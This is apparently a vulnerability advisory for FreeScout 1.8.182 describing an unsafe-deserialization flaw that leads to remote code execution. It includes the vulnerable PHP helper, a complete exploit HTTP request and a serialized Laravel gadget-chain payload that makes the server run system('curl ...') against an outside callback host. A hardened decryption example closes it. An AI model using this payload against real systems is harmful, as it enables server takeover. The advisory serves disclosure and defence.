/**
 * Safely decrypt.
 *
 * @param [type] $e [description]
 *
 * @return [type] [description]
 */
public static function decrypt($value, $password = null)
{
    try {
        // Both branches end in Encrypter::decrypt(), which passes the
        // decrypted plaintext to unserialize() by default.
        if (!$password) {
            $value = decrypt($value);
        } else {
            $value = (new \Illuminate\Encryption\Encrypter(md5($password)))->decrypt($value);
        }
    } catch (\Exception $e) {
        // Do nothing: on failure the original input is returned unchanged.
    }
    return $value;
}
GET […]/ef84dfd4/eyJpdiI6IkUyeHJCNkpaT2VUVXFkdjJ1SldRd2c9PSIsInZhbHVlIjoibHdqbXJsNXQ3SHVYU3R4SzJ1ZjN5dz09IiwibWFjIjoiYzBlZjMzZjYwOTljNzIyNmE1ZmE2ZDE2ZjdmMjFiYmVlZTM2ZjRhZDVjN2Y2M2M3N2ExNjQ5ZTY5OTEyMjkxNSJ9 HTTP/1.1
Host: freescout.web-hacks.ru
Cookie: laravel_session=eyJpdiI6ImVVRkcwbTVOZE1PWDB4bHU3TTBXZWc9PSIsInZhbHVlIjoielJrVUU4ZmxNdzJYVjVjUGVoa0ZERVNJMkZURUs1WWtGeTNQeEVOYk5HSmttT3lJcHl0QURxc0JjVWxXTTBiM25MNVJMTGZlbnFyRGY3ZmROVFhTY2FJcXZTQzhVcEtMc0xRSDM3ZTFnc25NOG82NXd0c0FJUEJaRFwvOXZYWURMIiwibWFjIjoiMjY1MzQ4Mzg5ZjZiM2FhNGIwOTZhZTY5Y2M0NzJjMTUyNzc3NThmZDU5YmI3OThiNDJiNDM1MDkzYzBhZTEzMSJ9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
a:4:{i:7;O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"%00*%00events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"%00*%00listeners";a:1:{s:46:"curl 097pa9w5cnrli4epluvehparhinab0zp.ssrf.pro";a:1:{i:0;s:6:"system";}}}s:8:"%00*%00event";s:46:"curl 097pa9w5cnrli4epluvehparhinab0zp.ssrf.pro";};i:7;i:7;}
Deserialization of untrusted data leads to Remote code execution (RCE) [1]
Product: FreeScout
Version: 1.8.182
CWE-ID:
• CWE-502: Deserialization of Untrusted Data
• CAPEC-586: Object Injection
CVSS vector v.4.0: 8.6 (AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
Description: The application performs deserialization of data that can be tampered with. An attacker can create objects of arbitrary classes, as well as fully control their properties, thereby allowing them to manipulate the web application's logic.
Vulnerable scenarios: /help/{mailbox_id}/auth/{customer_id}/{hash}/{timestamp}
Vulnerable parameters:
• customer_id
• timestamp
Exploitation conditions: APP_KEY knowledge
Researchers: Daniil Satyaev, Roman Cheremnykh, Artem Danilov (Positive Technologies)
Research
Vulnerable code:
Listing: Vulnerable code (app/Helper.php 850-870)
Exploitation scenario:
Listing: HTTP request to exploit "Deserialization of untrusted data"
Listing: Serialized payload to exploit blind RCE
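
A hardened counterpart to the helper in the vulnerable-code listing, added here as an example; it is not FreeScout's code or its patch. It assumes the illuminate/encryption Composer package is installed and that the affected route parameters (customer_id, timestamp) are non-negative integers; decryptIntParam() and the sample values are hypothetical.

```php
<?php
// Added example, not FreeScout code. Assumes illuminate/encryption is installed
// with Composer; decryptIntParam() is a hypothetical helper name.
require __DIR__ . '/vendor/autoload.php';

use Illuminate\Contracts\Encryption\DecryptException;
use Illuminate\Encryption\Encrypter;

/**
 * Decrypt a route token that must contain a non-negative integer
 * (customer_id, timestamp). Returns null on any failure.
 */
function decryptIntParam(Encrypter $encrypter, string $token): ?int
{
    try {
        // decryptString() checks the MAC and decrypts, but never calls
        // unserialize(), so no object can be created from the plaintext.
        $plain = $encrypter->decryptString($token);
    } catch (DecryptException $e) {
        return null; // fail closed: never hand the raw input back
    }

    // Accept plain digits, or the serialized-integer form "i:N;" that
    // encrypt() produces for an int, matched as text and never unserialized.
    if (!preg_match('/\A(?:i:(\d{1,18});|(\d{1,18}))\z/', $plain, $m)) {
        return null;
    }
    return (int) ($m[1] !== '' ? $m[1] : $m[2]);
}

// Constructed demo input: a throwaway random key, not a real APP_KEY.
$encrypter = new Encrypter(random_bytes(32), 'AES-256-CBC');

$samples = [
    'plain integer'       => $encrypter->encryptString('42'),
    'legacy encrypt(int)' => $encrypter->encrypt(1718000000),
    'serialized object'   => $encrypter->encrypt(new stdClass()),
    'garbage'             => 'not-a-token',
];

foreach ($samples as $label => $token) {
    printf("%-20s => %s\n", $label, var_export(decryptIntParam($encrypter, $token), true));
}
```

Because the exploitation condition is knowledge of APP_KEY, the MAC check alone does not stop a forged token; the type check on the decrypted plaintext is what keeps serialized objects out.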